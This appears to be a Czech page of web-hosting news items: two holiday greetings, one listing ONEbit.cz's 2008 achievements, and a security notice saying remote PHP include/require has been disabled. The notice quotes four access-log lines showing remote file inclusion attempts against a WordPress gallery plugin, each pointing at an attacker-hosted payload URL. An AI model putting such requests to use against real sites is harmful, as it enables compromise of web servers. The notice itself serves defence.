Pro/080
pour féliciter 2009
Vážení klienti, dovolte, abychom Vám poděkovali za přízeň, kterou jste nám v roce 2008 projevili. Vám všem, kteří jste se stali jedničkami na českém internetu, patří naše PF 2009 Chtěli bychom se s Vámi zároveň podělit o úspěchy, kterých jsme v uplynulém roce, především Vaší zásluhou, dosáhli: - již přes 4 000 klientů si zvolilo ONEbit.cz za svého poskytovatele webhostingových služeb - dle nezávislých měření dostupnosti se stále držíme na špici ve spolehlivosti poskytovaných služeb - průměrná dostupnost našich serverů převyšuje 99,999% (zdroj http://mereni.kyblsoft.cz) - CPRESS Media, a.s. nám udělilo prestižní ocenění "Nejlepší firemní web z oblasti IT", kategorie IT služby, sektor B2C - nasadili jsme profesionální ticket systém technické podpory, díky kterému vyřízení 1 požadavku trvá průměrně 21,3 minut - vybudovali jsme nové dohledové centrum s on-line monitoringem více než 20ti důležitých parametrů každého serveru - zdvojnásobili jsme počet serverů, farma ONEbit.cz nyní čítá 26 strojů - na dealerských provizích jsme přičetli přes 100 000 bodů - naše antispamové servery vyhodnotily přes 27 miliónů nevyžádaných poštovních zpráv - představili jsme novou službu pro snadnou tvorbu webových prezentací ONEweb.cz - a ještě mnohem více... Závěrem bychom Vás chtěli ubezpečit, že plánované zdražení elektrické energie na rok 2009 se stejně jako minulý rok nepromítne do koncových cen poskytovaných služeb. Naopak, v novém roce se můžete těšit jen na samá příjemná překvapení! Užijte si klidné a pohodové Vánoce, těšte se ze setkání s blízkými a do Nového roku vstupte plni optimismu. Budeme tu pro Vás i v roce 2009, Váš -- tým ONEbit.cz
Pro/080
Příjemné prožití svátk …
Příjemné prožití svátků vánočních, mnoho osobních i pracovních úspěchů a vše nejlepší v novém roce Vám přeje tým služby ASPone.cz.Pro/080
Zakázali jsme u funkcí include a require načítání zdrojového kódu z cizích webserverů
Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce Include a Require načtení zdrojového souboru z cizího webové serveru, tj. přes http nebo ftp. Na funkce fopen() by tato změna neměla mít vliv. Pokud byste potřebovali nahrávat věci z cizího serveru, použijte buď již zmiňovanou funkci fopen() nebo file_get_contents().
Zákaz jsme provedli přes direktivu allow_url_include = Off.
A jak takový útok např. může vypadat? Ukázka z logu - komentář snad netřeba:
xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:18 +0100] "GET /?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1" 200 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:14 +0100] “GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 “-” “Mozilla/3.0 (compatible; Indy Library)”
xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:14:33 +0100] “GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 “-” “Mozilla/3.0 (compatible; Indy Library)”
xxxx.cz 76.162.254.213 - - [08/Dec/2008:18:58:40 +0100] “GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pastebin.linode.com/?dl=1581??? HTTP/1.1″ 200 227 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1″
Pro/080